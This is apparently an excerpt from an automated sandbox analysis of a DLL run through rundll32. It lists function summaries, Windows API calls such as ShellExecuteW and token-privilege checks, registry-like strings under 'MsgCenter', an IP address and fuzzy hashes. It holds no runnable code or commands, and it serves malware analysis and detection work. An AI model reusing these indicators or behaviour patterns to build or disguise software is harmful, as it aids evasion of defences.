                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                                                  • String ID: p
                                                                                                  • API String ID: 526592482-2181537457
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32 ref: 000000018004B0BF
                                                                                                    • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                                                    • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
                                                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                                                    • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                                                    • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                                                    • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                                                    • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                                                    • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                                                  • memset.MSVCRT ref: 000000018004B0DA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                                                  • String ID: p
                                                                                                  • API String ID: 526592482-2181537457
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID: MsgCenter$PopMode
                                                                                                  • API String ID: 3702945584-2846135548
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryWindows_cwprintf_s_l
                                                                                                  • String ID: \%s
                                                                                                  • API String ID: 3550698841-3138977447
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID: MsgCenter$opentime_afterinstall
                                                                                                  • API String ID: 3702945584-3718352646
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CurrentSleepThread
                                                                                                  • String ID: 171.8.167.45
                                                                                                  • API String ID: 1164918020-2723241389
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID: MsgCenter$opentime_afterinstall
                                                                                                  • API String ID: 3702945584-3718352646
                                                                                                  • Opcode ID: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                                                  • Instruction ID: 21b9b515d364e76d08f8b9de98a0e6c83aa7314f475d7e108810017b28aec3e9
                                                                                                  • Opcode Fuzzy Hash: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                                                  • Instruction Fuzzy Hash: DA0188B2611B4482DB10DF69D854389B760F788BB0F00831AEA79137E4DF78C699CB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID: MsgCenter$opentime_afterupdate
                                                                                                  • API String ID: 3702945584-2434204715
                                                                                                  • Opcode ID: beb1ae4346af73a663e5dbad8c0c0307e5cc816e0ab553eec07c274b3700ac5b
                                                                                                  • Instruction ID: 47f7e770178fe590bed8ec104acc410721906707dfe2e3d629c186be1f535818
                                                                                                  • Opcode Fuzzy Hash: beb1ae4346af73a663e5dbad8c0c0307e5cc816e0ab553eec07c274b3700ac5b
                                                                                                  • Instruction Fuzzy Hash: 300188B2601B4482DB109F69D844389B760F788BB0F00831AEA79137E4DF78C699CB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow
                                                                                                  • String ID:
                                                                                                  • API String ID: 432778473-0
                                                                                                  • Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                                                  • Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
                                                                                                  • Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                                                  • Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%